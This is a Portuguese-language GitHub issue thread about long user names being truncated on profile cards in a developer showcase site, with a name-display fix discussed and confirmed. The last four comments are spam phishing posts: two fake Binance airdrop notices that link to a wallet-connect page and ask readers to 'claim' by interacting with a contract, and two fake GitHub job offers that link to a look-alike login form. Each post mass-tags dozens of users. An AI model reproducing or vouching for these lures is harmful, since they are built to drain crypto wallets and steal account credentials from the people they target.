### ISSUE TITLE
Nome cortando no card

### ISSUE THREAD

**Issue by birobirobiro** [dev-explorer-org/devexplorer-frontend#41]
Quando o nome do usuário é muito grande está cortando no card.

![image](https://user-images.githubusercontent.com/22185823/193960774-c1f8f764-520f-472d-a928-8538637d3c1f.png)

No mobile também está acontecendo:
![image](https://user-images.githubusercontent.com/22185823/193960827-40234e4a-eb73-46f2-a89c-a929fcf9ff8b.png)

**Comment by valdemirfilho** [comment]
Por enquanto eu fiz isso propositalmente via css para não quebrar o layout caso os nomes fossem muito extensos. Aceito sugestões! 🙂

**Comment by valdemirfilho** [comment]
Vou deixar exibindo somente os 2 primeiros nomes por enquanto até encontrarmos uma melhor solução.

**Comment by birobirobiro** [comment]
> Vou deixar exibindo somente os 2 primeiros nomes por enquanto até encontrarmos uma melhor solução.

Eu até tentei estilizar os nomes no CSS, mas não deu muito certo. Depois vou tentar ver com mais calma e encontrar alguma solução.

Uma alternativa também e acho que seria até mais fácil de manipular seria no arquivo do usuário pedir nome e sobre em campos separados.

**Comment by amanciio93** [comment]
Cara, acho aquele padrão de nome e apenas um sobrenome muito mais bonito pra apresentações, e aí na página de cada um poderia mostrar o nome inteiro.

Na apresentação poderia ficar assim:

1. FOTO;
2. NOME E UM SOBRENOME;
3. TURMA DO EXPLORER
Ex: 
Foto Amancio 
Jonathan Amancio
Turma 05.

**Comment by valdemirfilho** [comment]
Criei uma função para verificar quando existe "da", "de" no nome e exibir a terceira palavra ao invés de somente duas como estava antes. Vou deixar a issue aberta por enquanto para vocês testarem e confirmarem se o problema realmente foi resolvido para os nomes atualmente cadastrados. 👍

**Comment by Rrhapsod** [comment]
Perfeito, arrumou totalmente.

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @rayane-barbosa, @rafaelmaxdev, @JhonPrFer, @CostaJoel, @flavioalbuquerque, @nikolagiin, @florybal, @moliveiracn, @yuribarbosadelima, @vinicmd, @renanvy, @gabrielifloss, @otiagosantos, @gui-laranjeira, @Matheusd3v, @danilocdesousa, @jotavetech, @allythy, @FlippityScoop, @guilherme950, @ellisonleao, @idontwantcookies, @marcuslaraa, @brenno-calado, @Ribeiro-Vinicius, @00b00, @MrErlison, @HeryPoet, @DiegoMi96, @leotakeo, @lucasdesouza-dev, @ruanvalente, @flavialbraz, @Nickolaz47, @eduardafa, @luedourado, @KayllaneGPina, @thiagoglara, @marciomaciel, @anderson-tomkelski, @cvoznak, @vanessacoin, @artur-rios, @gabrielpxo, @vitorlopesdealmeida, @pedroramon, @NmadHarpy, @pmagalhaes2, @ioprudente, @erivando-germano

**Comment by anilv2k** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @acekiller, @JubaCandido, @CadisRaziel, @richardbertozzo, @fao89, @hugoalmeidahh, @vazConnected, @mleandrojr, @vitorjaum, @SousaPedrop, @rubaun, @fsbflavio, @nelsontmiranda, @DaviDiasBR, @ecureuill, @felipedantas-pi, @RaulMyron, @DiegoCoriolano, @liverday, @Marcosgcr, @andreysilveira, @mariarita26, @bitmattz, @marquesneto, @VictorHDS, @mattossmatheus, @zthiagovalle, @wbpereiraa, @JoaoVictor-HM, @NalbertLeal, @BrunoGianetti, @alexolive87, @kauandragues, @Bazaran, @silveriohiago, @heroumcaslu, @GilAlvez, @eduardochamp1, @ifasanelli, @layotunde, @WagnerFalcao, @dezzare, @jowjow22, @ziiklinux, @Lainfall, @TakakaraRoxa, @raqferre, @Lucas2612, @ronilsonreis, @ceciliasilvads

**Comment by deepak7774** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
GabrielPaixaoJustino, @meirinaldojunior, @gbrlbrbs, @fcv, @Ckk3, @AlvaroBrasilia, @AndersonJss, @dutviol, @minamicr, @linces, @leandrovip, @juanprog, @t00lmaker, @quixote15, @wzomer, @arturgamma, @andrevargas, @lucasgabrielcastro, @alisson2melo, @gbiankatf

**Comment by deepak7774** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
pedrofurtado, @caarloshenrique, @oAllanWeb, @PMoneda, @AlexandreMT, @luciorubeens, @luanholiv, @pchaves83, @gmuraoka, @alcidesmig, @heat, @RomuloDomiciano, @thiagofp0, @italosantana, @tech3br, @FelipeGrijo, @andreazevedobauru, @victtavares, @alissonclr, @jhonndabi
